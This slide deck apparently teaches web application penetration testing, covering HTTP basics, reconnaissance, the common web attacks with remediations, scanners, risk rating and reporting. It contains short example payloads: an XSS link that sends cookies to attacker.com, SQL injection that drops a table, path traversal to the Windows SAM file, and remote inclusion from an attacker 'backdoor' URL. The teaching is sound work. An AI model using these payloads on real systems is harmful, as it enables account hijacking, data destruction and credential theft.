94
Web Application Security Satish B [email protected] http://www.securitylearn.net

Pentesting web applications

  • Upload
    satish-b

  • View
    12.893

  • Download
    5

Embed Size (px)

DESCRIPTION

 

Citation preview

Page 1: Pentesting web applications

Web Application Security

Satish [email protected]

http://www.securitylearn.net

Page 2: Pentesting web applications

Is it only Hacking ?

Web Application Security

No

http://www.securitylearn.net

Page 3: Pentesting web applications

Web Application Security

http://www.securitylearn.net

Page 4: Pentesting web applications

Background History, http, https…

Information gathering Platform details, application knowledge, domain knowledge…

Manual testing XSS, SQL Injection, CSRF…

Tools Scanners…

Remediation Suggestions…

Documentation Reports…

Risk assessment

Web Application Security

http://www.securitylearn.net

Page 5: Pentesting web applications

URI

The Request-URI is a Uniform Resource Identifier It identifies the resource upon which to apply the request.

http://www.address.edu:1234/path/subdir/file.ext

protocol host port Files and resource

hostnames are case-insensitive 80 is the default port

http://www.securitylearn.net

Page 6: Pentesting web applications

To understand web we need to know about HTTP – Hyper text transfer protocol.

Application Layer Protocol Uses TCP as its transport mechanism Core Communication Protocol to access web Message based Model

Client Message – Request Server Message – Response

Stateless Server does not maintain user information for every request

Cookies were introduced to make it stateful

HTTP

http://www.securitylearn.net

Page 7: Pentesting web applications

HTTP HTTP Transaction

http://www.securitylearn.net

Page 8: Pentesting web applications

HTTP Message Types HTTP messages consist of requests from client to

server and responses from server to client. Both types of message consist of

start-line (a request-line or a status-line) zero or more header-fields (also known as "headers"), an empty line (i.e., a line with nothing preceding the CRLF)

indicating the end of the header fields, and (possibly) a message-body.

http://www.securitylearn.net

Page 9: Pentesting web applications

Request Line + Headers + Empty Line

Sample

GET /books/search.asp?q=wahh HTTP/1.1

Accept: image/gif, image/xxbitmap, image/jpeg, image/pjpeg,application/xshockwaveflash, application/vnd.msexcel,application/vnd.mspowerpoint, application/msword, */*

Accept-Language: en-gb,en-us;

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: www.example.com

Request Line = Method + Resource Location + HTTP Version

HTTP Request

http://www.securitylearn.net

Page 10: Pentesting web applications

Request Line + Headers + Empty Line + Body

Sample

POST /books/search.asp HTTP/1.1

Accept: image/gif, image/xxbitmap, image/jpeg, image/pjpeg,application/xshockwaveflash, application/vnd.msexcel,application/vnd.mspowerpoint, application/msword, */*

Accept-Language: en-gb,en-us;

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: www.example.comContent-Length: 10

q=Wahh

Request Line = Method + Resource Location + HTTP Version

HTTP Request

http://www.securitylearn.net

Page 11: Pentesting web applications

Response Line + Headers + Empty Line + Body

Sample

HTTP/1.1 200 OK

Date: Thu, 30 Jun 2011 13:49:37 GMT

Server: IBM_HTTP_SERVER/1.3.26.2 Apache/1.3.26 (Unix)

Content-Type: text/html;charset=ISO-8859-1

Content-Language: en-US

Content-Length: 24246

<!DOCTYPE html PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>

<html lang=”en”>

<head>

Response Line = HTTP Version + Response Code

HTTP Response

http://www.securitylearn.net

Page 12: Pentesting web applications

GET Retrieve resources

POST Performing actions

HEAD To check the existence of a resource

TRACE Diagnostic purposes

OPTIONS To find HTTP methods that are available for a resource

PUT To upload a resource to the server

DELETE To delete a resource on the server

HTTP Methods

http://www.securitylearn.net

Page 13: Pentesting web applications

Safe Methods – Retrieve information and should not change server state GET HEAD TRACE OPTIONS

Unsafe Methods – Make changes to the server state PUT POST DELETE

HTTP Methods

http://www.securitylearn.net

Page 14: Pentesting web applications

HTTP Header-Fields

HTTP header-fields include general-headers request-headers response-headers content-headers

Each header-field consists of a name followed by a colon and the field value

http://www.securitylearn.net

Page 15: Pentesting web applications

Privacy Anyone can see content

Integrity Someone might alter content

Authentication Not clear who you are talking with

Security Issues In HTTP

http://www.securitylearn.net

Page 16: Pentesting web applications

HTTP is unencrypted and insecure HTTPS uses a secure transport mechanism (SSL) Protects privacy and integrity of all data passing over

network

HTTPS

http://www.securitylearn.net

Page 17: Pentesting web applications

HTTPS Transaction

http://www.securitylearn.net

Page 18: Pentesting web applications

TLS Basics

TLS consists of two protocols Handshake protocol

Use public-key cryptography to establish a shared secret key between the client and the server

Record protocol Use the secret key established in the handshake protocol to protect

communication between the client and the server We will focus on the handshake protocol

http://www.securitylearn.net

Page 19: Pentesting web applications

Handshake Protocol StructureClientHello

ServerHello,

[Certificate],

[ServerKeyExchange],

[CertificateRequest],

ServerHelloDone

[Certificate],

ClientKeyExchange,

[CertificateVerify]

Finished

switch to negotiated cipher

Finished

switch to negotiated cipher

http://www.securitylearn.net

Page 20: Pentesting web applications

It mediates access between the client browser and the destination web server.

When a browser has been configured to use a proxy Browser sends all of its requests to the proxy Proxy passes the requests to the relevant web servers Proxy forwards the responses back to the browser

Most proxies also provide additional services, including

caching, authentication, and access control Proxy is a program which acts as a client & server. It modifies the

request in between communication and maintain caches

Proxy

http://www.securitylearn.net

Page 21: Pentesting web applications

Different representation of same data URL Encoding

Permitted characters in the URLs %20 space

UNICODE Designed to support all the writing systems in the world %u2215 /

HTML Encoding Represent problematic characters to safely incorporate in HTML page &quot; &

Base 64 Encoding Encoding process input in blocks of 3 bytes ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

VGhlIFdlYiBBcHBsaWNhdGlvbiBIYWNrZXIncyBIYW5kYm9vaw==

Encoding techniques

http://www.securitylearn.net

Page 22: Pentesting web applications

Background History, http, https…

Information gathering Platform details, application knowledge, domain knowledge…

Manual testing XSS, SQL Injection, CSRF…

Tools Scanners…

Remediation Suggestions…

Documentation Reports…

Risk assessment

Web Application Security

http://www.securitylearn.net

Page 23: Pentesting web applications

To find resources on the server Web Spidering, web crawling Brute force – to discover hidden content Use search engines - site: google.com Gain application knowledge Identify server technologies Banner grabbing, Meta tags Tool :HttpPrint, Online: netcraft.com File Extensions

asp—Microsoft Active Server Pages aspx—Microsoft ASP.NET jsp—Java Server Pages cfm—Cold Fusion php—the PHP language

Profiling application

http://www.securitylearn.net

Page 24: Pentesting web applications

From session tokens JSESSIONID—The Java Platform ASPSESSIONID—Microsoft IIS server ASP.NET_SessionId—Microsoft ASP.NET CFID/CFTOKEN—Cold Fusion PHPSESSID—PHP

Identify Input locations Look for robots.txt file Error codes in the application

Microsoft OLE DB Provider for ODBC Drivers (0x80004005)

[DBNETLIB][ConnectionOpen(Connect())] - SQL server does not exist or access denied

Profiling application

http://www.securitylearn.net

Page 25: Pentesting web applications

Request GET /books/search.asp?q=wahh HTTP/1.1

Accept-Language: en-gb,en-us;

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: www.example.com

ResponseHTTP/1.1 200 OK

Date: Thu, 30 Jun 2011 13:49:37 GMT

Server: Apache/1.3.26 (Unix)

Content-Type: text/html;charset=ISO-8859-1

Content-Language: en-US…

Profiling application

http://www.securitylearn.net

Page 26: Pentesting web applications

Background History, http, https…

Information gathering Platform details, application knowledge, domain knowledge…

Manual testing XSS, SQL Injection, CSRF…

Tools Scanners…

Remediation Suggestions…

Documentation Reports…

Risk assessment

Web Application Security

http://www.securitylearn.net

Page 27: Pentesting web applications

Attacking Authentication Attacking Authorization Cryptography weaknesses Breaking Session management Cross site scripting SQL injection Cross site request forgery URL redirection HTTP Response splitting File upload Path traversal attacks Server configuration issues, caching Attacking webserver

Common attacks

http://www.securitylearn.net

Page 28: Pentesting web applications

What - Confirms the identity of a user Why - To protect web content Normally relies on username and password Authentication takes place with every browser-server interaction Types –

HTTP integrated Basic Digest - hash NTLM - Integrated windows

Form-based POST delivered parameters

Authentication

http://www.securitylearn.net

Page 29: Pentesting web applications

Authentication

Client request

Base 64 credentials

401 response

Valid response

Base 64 credentials

Login Credentials

Valid response

http://www.securitylearn.net

Page 30: Pentesting web applications

Try default accounts and password ex: admin/admin Capture credentials over HTTP - unencrypted channel Capture credentials passed in URLs Auto complete in login page Remember me Predictable usernames - numbers, emails Password requirements – length, allowed characters

Real attack – gawker

Bruteforce attacks – Dictionary attack, search attack Account lockout Through error messages

“User account not found” or “Password incorrect ”

Change password without original

Attacking Authentication

http://www.securitylearn.net

Page 31: Pentesting web applications

Shoulder Surfing Forgot password functionality Forceful browsing – authentication not verified on server

Attacking Authentication

http://www.securitylearn.net

Page 32: Pentesting web applications

Attacking Authentication Attacking Authorization Cryptography weaknesses Breaking Session management Cross site scripting SQL injection Cross site request forgery URL redirection HTTP Response splitting File upload Path traversal attacks Server configuration issues Attacking webserver

Common attacks

http://www.securitylearn.net

Page 33: Pentesting web applications

What – Specifies access rights of a user Why - To access control web content/resources Normally relies on access control policies Authorization takes place with every browser-server interaction Types

Programmatic control – every user access stored in database Roles based control – Roles contain different set of privileges and each user is

assigned to one role

Authorization

http://www.securitylearn.net

Page 34: Pentesting web applications

Tampering parametersEx: http://www.citibank.com/userprofile.php?user=satish

Directly requesting the restricted resources Horizontal Escalation Vertical Escalation

Attacking Authorization

http://www.securitylearn.net

Page 35: Pentesting web applications

Attacking Authentication Attacking Authorization Cryptography weaknesses Breaking Session management Cross site scripting SQL injection Cross site request forgery URL redirection HTTP Response splitting File upload Path traversal attacks Server configuration issues Attacking webserver

Common attacks

http://www.securitylearn.net

Page 36: Pentesting web applications

Cipher- Encryption, Decryption algorithms Transposition cipher - rearrange the letters in a word

'help' is 'ehpl‘

Substitution cipher - replacing a letter with a different letter 'abc' is 'bcd' here replacing a letter by a following letter (a+1=b)

Symmetric Algorithms Uses same key for encryption and decryption

Asymmetric Algorithms Uses different keys for encryption and decryption

Steganography – hiding messages in images Use of weak algorithms for https SSL Testing – SSL digger

Use of weak Hashing algorithms MD5 passwords – Rainbow tables

Cryptography

http://www.securitylearn.net

Page 37: Pentesting web applications

Use of weak algorithms for https SSL Testing – SSL digger

Use of weak Hashing algorithms MD5 passwords – Rainbow tables http://www.tmto.org/pages/passwordtools/hashcracker/

PBKDF2

Cryptography Weaknesses

http://www.securitylearn.net

Page 38: Pentesting web applications

Attacking Authentication Attacking Authorization Cryptography weaknesses Breaking Session management Cross site scripting SQL injection Cross site request forgery URL redirection HTTP Response splitting File upload Path traversal attacks Server configuration issues Attacking webserver

Common attacks

http://www.securitylearn.net

Page 39: Pentesting web applications

Session id: is used to associate specific web page activity with a specific user so that sense of the state was prevented for the web application.

May transmitted in GET

Browser History Server Logs

POST Difficult to POST in every request

Cookie

Session Management

http://www.securitylearn.net

Page 40: Pentesting web applications

Secure flag HTTPOnly flag Static session – same session for the user on every login Randomness – SID strength, length Meaningful cookies - username in cookies Reusing cookies – login multiple times, Burp Sequencer SID in URL Persistent cookies Session timeout Session fixation Logout – does not expire session

Breaking Sessions

http://www.securitylearn.net

Page 41: Pentesting web applications

Attacking Authentication Attacking Authorization Cryptography weaknesses Breaking Session management Cross site scripting SQL injection Cross site request forgery URL redirection HTTP Response splitting File upload Path traversal attacks Server configuration issues Attacking webserver

Common attacks

http://www.securitylearn.net

Page 42: Pentesting web applications

Breaks same origin policy A loophole in the application using which an attacker can inject malicious

scripts into a page sent by your server. Browsers treat these injected scripts like any other script in the page

Cross-Site” means: Foreign script sent via server to client Attacker makes Web-Server deliver malicious script code Malicious script is executed in Client’s Web Browser

Scripting: Web Browsers can execute commands Embedded in HTML page Supports different languages (JavaScript, VBScript, ActiveX, etc.) Most prominent: JavaScript

Types Stored XSS Reflective XSS DOM based XSS

Cross Site Scripting

http://www.securitylearn.net

Page 43: Pentesting web applications

DOM based XSS If a piece of JavaScript access the URL request parameters and use that information

to write a html content to its own page with out html encoding

Reflective XSS Non-persistent when data provided by a web client is used immediately by server-side scripts to

generate a page of results for that user.

Stored XSS Persistent when data provided to a web application by a user is first stored persistently on the

server (in a database, file system, or other location), and later displayed to users in a web page without being encoded using HTML entities

Ex: Blogs, Comments, Job Postings

Cross Site Scripting

http://www.securitylearn.net

Page 44: Pentesting web applications

Client browser sends an error message to the web server. https://example.com/error.php?message=Sorry%2c+an +error+occurred

The error message is “Reflected” back from the Web server to the client in a web page. 

<p>Sorry, an error occurred.</p>

We can replace the error with JavaScript 

https://example.com/error.php?message=<script>alert(‘xss’);</script> 

Cross Site Scripting

http://www.securitylearn.net

Page 45: Pentesting web applications

User logs into legitimate site. Site sends user authentication cookie. Attacker sends XSS attack containing injected code to user.

https://example.com/error.php?message=<img src=‘http://attacker.com/’+document.cookie/>

User clicks on XSS link in email, web, IM. Browser contacts vulnerable URL at legitimate site. Legitimate site returns injected code in web page. Browser runs injected code, which sends cookies to the attacker.com. The attacker monitors requests to attacker.com and captures the user

cookie Attacker uses cookie to authenticate to legitimate site as the user.

Anatomy of XSS

http://www.securitylearn.net

Page 46: Pentesting web applications

Hijack User accounts Steal cookies Steal Credentials

Modify Web pages – Defacement Company will lost public image Lost money & Customers

Record Keystrokes from the browser Steal clipboard data Execute any command at the client machine Cause denial of service – crash browser

Attacker can do anything a user can do on his machine

Cross Site Scripting Impact

http://www.securitylearn.net

Page 47: Pentesting web applications

Validate Input Input data contains only a certain permitted set of characters Choose white list Perform server side validation

Encode Output If application copies user input in the responses, this data should be encoded

properly using HTML encoding

Ex: Escape & < > " ' as &amp; &lt; &gt; &quot; &#39;

Mark session cookies as HTTPOnly to protect them from stealing

XSS Remedy

http://www.securitylearn.net

Page 48: Pentesting web applications

Attacking Authentication Attacking Authorization Cryptography weaknesses Breaking Session management Cross site scripting SQL injection Cross site request forgery URL redirection HTTP Response splitting File upload Path traversal attacks Server configuration issues Attacking webserver

Common attacks

http://www.securitylearn.net

Page 49: Pentesting web applications

Every web application uses a database to store information SQL is used to mange information in the database User-supplied data is incorporated into SQL statement

Unsafe way – SQL injection Safe way – Secure

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. This alters the execution behaviour of the backend query and allows an attacker to execute unauthorized SQL commands.

Types Error based SQLi Blind SQLi – Time based delays, Union Queries

TOOLS: SQLMap, SQLNinja, Absinthe

SQL Injection

http://www.securitylearn.net

Page 50: Pentesting web applications

Classified based on data retrieval Inbound

Error Based data retrieval Outbound

Direct connection to the database or communication through other channel Inference

Data extraction in Blind SQL injection

SQL Injection

http://www.securitylearn.net

Page 51: Pentesting web applications

Books catalog – allows a user to search for a book by author name 

https://example.com/error.php?authorname=James

The backend query to retrieve the books details is SELECT title,year FROM books WHERE author = ‘James’

Result : Web site displays the list of books written by James

SQL Injection Example

http://www.securitylearn.net

Page 52: Pentesting web applications

If an attacker injects a SQL interpreted character in the input it alters the meaning of the back end query

https://example.com/error.php?authorname=O’Reilly

The query becomes SELECT title,year FROM books WHERE author = ‘O’Reilly’

Extra single quote in the SQL query breaks the syntax of the SQL statement.

Result : Web site displays an error message

Incorrect syntax near ‘Reilly’.

Unclosed quotation mark before the character string ‘

SQL Injection Example

http://www.securitylearn.net

Page 53: Pentesting web applications

Attacker injects an input which doesn’t break the syntax. https://example.com/error.php?authorname=James’ or 2=2––

The backend query becomes

SELECT title,year FROM books WHERE author = ‘James’ or 2=2––’

Result : Web site displays the list of books written by James

SQL Injection Example

http://www.securitylearn.net

Page 54: Pentesting web applications

Attacker can inject dangerous SQL statements

https://example.com/error.php?authorname=James’; drop table books;––

The backend query becomes

SELECT title,year FROM books WHERE author = ‘James’ ; drop table books;––

Result : Web site displays the list of books written by James

It deletes the books table from the database

SQL Injection Example

http://www.securitylearn.net

Page 55: Pentesting web applications

Alter the database – Add new tables, delete existing tables, etc… Compromise user accounts by obtaining their passwords Collects sensitive data like credit card numbers, SSN, etc… Can access the files on the server Cause Denial of service by stopping the database

Attacker can do anything a DBA can do

SQL Injection Impact

http://www.securitylearn.net

Page 56: Pentesting web applications

Validate Input Input data contains only a certain permitted set of characters Choose white list Perform server side validation

Parameterized queries (show samples) Also known as prepared statements Define all the SQL statements first and then pass parameters Attacker can not change the intent of the query

Stored procedures also works

To reduce the Impact Store passwords in salted hash format Connect to the database with Low privileged user

SQL Injection Remedy

http://www.securitylearn.net

Page 57: Pentesting web applications

Attacking Authentication Attacking Authorization Cryptography weaknesses Breaking Session management Cross site scripting SQL injection Cross site request forgery URL redirection HTTP Response splitting File upload Path traversal attacks Server configuration issues Attacking webserver

Common attacks

http://www.securitylearn.net

Page 58: Pentesting web applications

Web applications uses cookie to keep track of user session Application sets a cookie in a user’s browser, the browser will

automatically submit that cookie back to the application in every subsequent request.

The browser submits the cookie regardless of whether the request originates from a link provided by the application itself or from a URL received from elsewhere, such as in an email or on another web site.

A Cross-site request forgery hole is when a malicious site web site that causes the user’s browser to submit a request directly to the vulnerable application, to perform some unintended action that is beneficial to the attacker.

TOOL : CSRFTester

Cross Site Request Forgery

http://www.securitylearn.net

Page 59: Pentesting web applications

Bank website – Allows to transfer money from one account to other account

Transaction page in the bank website contains the following code

<form method=POST action=‘Transaction. asp’> <input type=text name=‘SourceAccount’ value=>

<input type=text name=‘DestinationAccount’ value=>

<input type=text name=‘Amount’ value=>

CSRF Example

http://www.securitylearn.net

Page 60: Pentesting web applications

The user logged into the bank website User visits a malicious website which sends the following request

<img src=http://bank.com/?SourceAccount=23456&

DestinationAccount=attackeraccount&Amount=10000>

The browser attaches bank.com cookies to the above request and send it to the server

The application transfers the amount to the attacker account with out the user intervention.

Anatomy of CSRF

http://www.securitylearn.net

Page 61: Pentesting web applications

Reauthenticate user for every important transaction Use of CAPTCHA for sensitive transaction Random tokens in every request

It breaks the Brower back button feature Implement random tokens at every transaction (POST requests) Do not transmit tokens in the URLs Validate the token on the server side

CSRF Remedy

http://www.securitylearn.net

Page 62: Pentesting web applications

Attacking Authentication Attacking Authorization Cryptography weaknesses Breaking Session management Cross site scripting SQL injection Cross site request forgery URL redirection HTTP Response splitting File upload Path traversal attacks Server configuration issues Attacking webserver

Common attacks

http://www.securitylearn.net

Page 63: Pentesting web applications

A URL Redirection is to bring the browser from one URL to another URL. http://www.example.com/click.php?id=215&url=http://www.google.com

Redirection to sites which install malware. Possible to perform phishing attacks. Possible to exploit browser vulnerabilities.

URL Redirection

http://www.securitylearn.net

Page 64: Pentesting web applications

Acquiring sensitive information (username, password and credit cards) by masquerading as a trusted website.

Attack Scenario Attacker convinces the victim to click on the link of fake login page which resembles

a genuine login page. Victim enters his credentials in fake login page that goes to attacker Victim is then redirected to an error page or genuine website depending on attacker

Social Engineering tool kit

Phishing

http://www.securitylearn.net

Page 65: Pentesting web applications

Validate user input properly. Create mapping for pages names on server and use mapped values in

requests. Ex: 1 – home.asp, 2 – index.asp

URL: http://www.example.com/redirect.php?=1

URL Redirection Remedy

http://www.securitylearn.net

Page 66: Pentesting web applications

Attacking Authentication Attacking Authorization Cryptography weaknesses Breaking Session management Cross site scripting SQL injection Cross site request forgery URL redirection HTTP Response splitting File upload Path traversal attacks Server configuration issues Attacking webserver

Common attacks

http://www.securitylearn.net

Page 67: Pentesting web applications

HTTP protocols: Headers separated by a single CR or LF Headers separated from the body by 2 CRs or LFs

Attack Possibility: When user data inserted in response headers.

Ex: Cookies, Location header… Inject CRs and LFs in such manner that a second HTTP message is formed

where only one was expected by the application. CR LF Terminates the first response and forms the second response

Used to deface web sites, poison cache and trigger cross-site scripting

HTTP Response Splitting

http://www.securitylearn.net

Page 68: Pentesting web applications

Original: http://www.mysite.com/default.aspx?user=a

Modified:http://www.mysite.com/default.aspx?user=a%0D%0A%0D%0AHTTP/1.1 200 OK

Response: HTTP/1.1 200 Ok Location: http://www.mysite.com/default.aspx?user=a

HTTP/1.1 200 OK …

HTTP Response Splitting

http://www.securitylearn.net

Page 69: Pentesting web applications

Validate input properly. Do not insert user input in response headers.

HTTP Response Splitting Remedy

http://www.securitylearn.net

Page 70: Pentesting web applications

Attacking Authentication Attacking Authorization Cryptography weaknesses Breaking Session management Cross site scripting SQL injection Cross site request forgery URL redirection HTTP Response splitting File upload Path traversal attacks Server configuration issues Attacking webserver

Common attacks

http://www.securitylearn.net

Page 71: Pentesting web applications

When a user is able to upload a file which is not validated by the server, a potential exists to upload malicious code to the server and execute it remotely.

If the web application allows file upload, it is important to check if it is possible to upload HTML content. For instance, if HTML or TXT files are allowed, XSS payload can be injected in the file uploaded.

Web Shells C99 shell Pwn.jsp Browser.asp

Denial of service Large files uploading

Null Character (%00) attacks Client side validation

File Upload

http://www.securitylearn.net

Page 72: Pentesting web applications

Validate file names and implement a white list for allowed file extensions.

Configure antivirus on web server for disk write events. Put a size limit on file upload. Perform checks on file header (MIME).

Demo on Hex editors usage Demo & practical on web shells

File Upload Remedy

http://www.securitylearn.net

Page 73: Pentesting web applications

Attacking Authentication Attacking Authorization Cryptography weaknesses Breaking Session management Cross site scripting SQL injection Cross site request forgery URL redirection HTTP Response splitting File upload Path traversal attacks Server configuration issues Attacking webserver

Common attacks

http://www.securitylearn.net

Page 74: Pentesting web applications

Web applications reads from or write to file systems based on the user data supplied (file uploading and downloading)

Un-validated input allows application to access files which are not intended for access

Read server configurations files and source code

http://www.abc.com/getimpage.aspx?file=logo.jpg Extracts the value of the file parameter from the query string. Appends this value to the prefix C:\wahh-app\images\. Opens the file with this name. Reads the file’s contents and returns it to the client.

http://www.abc.com/getimpage.aspx?file=..\..\boot.ini http://www.abc.com/getimpage.aspx?file=..\..\windows\repair\sam

Path Traversal Attacks

http://www.securitylearn.net

Page 75: Pentesting web applications

Languages support the use of include files Code in the include file interpreted just as if it had been inserted at the

location of the include directive.

Include files are loaded from user input Remote file inclusions

PHP is more vulnerable PHP include function accepts remote paths

https://app.com/main.php?Country=US

https://app.com/main.php?Country=http://attacker.com/backdoor

Local file inclusions Including other files on the same server Normally files that the user does not have access

File Inclusion Attacks

http://www.securitylearn.net

Page 76: Pentesting web applications

Validate user input properly. Blacklist ../ characters. Run web server with low privileged user.

Remedy

http://www.securitylearn.net

Page 77: Pentesting web applications

Attacking Authentication Attacking Authorization Cryptography weaknesses Breaking Session management Cross site scripting SQL injection Cross site request forgery URL redirection HTTP Response splitting File upload Path traversal attacks Server configuration issues Attacking webserver

Common attacks

http://www.securitylearn.net

Page 78: Pentesting web applications

Directory listings Source code disclosure Documents Caching WEBDAV methods Backup files for access Debug functionality Displaying Stack traces to the user

Server Configuration Issues

http://www.securitylearn.net

Page 79: Pentesting web applications

Attacking Authentication Attacking Authorization Cryptography weaknesses Breaking Session management Cross site scripting SQL injection Cross site request forgery URL redirection HTTP Response splitting File upload Path traversal attacks Server configuration issues Attacking webserver

Common attacks

http://www.securitylearn.net

Page 80: Pentesting web applications

Popular web servers Microsoft IIS Apache IBM WebSphere Oracle WebLogic Apache Tomcat JBoss

Un-patched software Test Scripts Denial of service attacks Buffer overflow attacks

Server Extenstions

Attacking Web Server

http://www.securitylearn.net

Page 81: Pentesting web applications

Attacking Authentication Attacking Authorization Cryptography weaknesses Breaking Session management Cross site scripting SQL injection Cross site request forgery URL redirection HTTP Response splitting File upload Path traversal attacks Server configuration issues Attacking webserver

Common attacks

http://www.securitylearn.net

Page 82: Pentesting web applications

A1: Injection A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session Management A4: Insecure Direct Object References A5: Cross-Site Request Forgery (CSRF) A6: Security Misconfiguration A7: Insecure Cryptographic Storage A8: Failure to Restrict URL Access A9: Insufficient Transport Layer Protection A10: Unvalidated Redirects and Forwards

OWASP Top 10

http://www.securitylearn.net

Page 83: Pentesting web applications

Background History, http, https…

Information gathering Platform details, application knowledge, domain knowledge…

Manual testing XSS, SQL Injection, CSRF…

Tools Scanners…

Remediation Suggestions…

Documentation Reports…

Risk assessment

Web Application Security

http://www.securitylearn.net

Page 84: Pentesting web applications

Tools automate the ‘attack’ on the web server/database server. Send protocol specific requests to the server to test for common

vulnerabilities How they work ?

Signature based

Phases Crawl Audit (attack) Report

Tools AppScan – IBM WebInspect – HP Accunetix Vega…

Automated Tools

http://www.securitylearn.net

Page 85: Pentesting web applications

Good at Testing for 100s of common vulnerabilities and mis-configurations that are

impractical to test for manually Regression testing of servers to ensure they stay secure – especially after activities

like patching or new code deployment Ability to schedule automated scanning/testing for off-production hours to avoid

conflicts

Not good at Automated tools are most effective at ‘guessing’ and using known signatures to

identify issues Most applications are custom developed and complex in nature Detailed exploits that require intelligent feedback and analysis Can not find business logic bugs

Automated Tools

http://www.securitylearn.net

Page 86: Pentesting web applications

Problems Testing can adversely impact a system being scanning (ex: filling database) Performance issues and crashing can happen The most rigorous testing usually requires special planning and may overload log

files, set off IDS sensors and leave ‘junk’ application data False positives & False Negatives.

Automated Tools

http://www.securitylearn.net

Page 87: Pentesting web applications

Background History, http, https…

Information gathering Platform details, application knowledge, domain knowledge…

Manual testing XSS, SQL Injection, CSRF…

Tools Scanners…

Remediation Suggestions…

Documentation Reports…

Risk assessment

Web Application Security

http://www.securitylearn.net

Page 88: Pentesting web applications

Why Risk assessment ? Prioritize tasks

Likelihood Probability of attack to happen Ease of discovery Easy of exploit

Impact Effect of the attack Loss of confidentiality, Business damage, Financial damage

Total Risk = Likelihood * Impact CVE standard

https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology

Risk Assessment

http://www.securitylearn.net

Page 89: Pentesting web applications

Background History, http, https…

Information gathering Platform details, application knowledge, domain knowledge…

Manual testing XSS, SQL Injection, CSRF…

Tools Scanners…

Remediation Suggestions…

Documentation Reports…

Risk assessment

Web Application Security

http://www.securitylearn.net

Page 90: Pentesting web applications

Documentation world - You must not only be able to do your job, but also provide written proof of how you’ve done it.

To make it understandable to the organization (developers). Mostly PDF formats NDA – Non Disclosure Agreements Report

Who tested it? Details Disclaimers

Environment details (URLs) Summary (Graphs) Technical Details

Risk Description, Reproduction steps Remediation's

Reports

http://www.securitylearn.net

Page 91: Pentesting web applications

Background History, http, https…

Information gathering Platform details, application knowledge, domain knowledge…

Manual testing XSS, SQL Injection, CSRF…

Tools Scanners…

Remediation Suggestions…

Documentation Reports…

Risk assessment

Web Application Security

http://www.securitylearn.net

Page 92: Pentesting web applications

Web Application Firewalls Blocks suspicious web requests depending on some known malicious

pattern that is embedded in the request. Web Application Firewalls

Check for malicous input values Check for modification of read-only parameters Block requests or filter out parameters

Can help to protect „old“ applications No source code available No know-how available No time available

No general solution Usefulness depends on application Not all applications can be protected

OWASP ESAPI – to filter input

http://www.securitylearn.net

Page 93: Pentesting web applications

Web Services Flash Ajax Activex Controls Java Signed applets

Advanced Technologies

http://www.securitylearn.net

Page 94: Pentesting web applications

http://www.securitylearn.net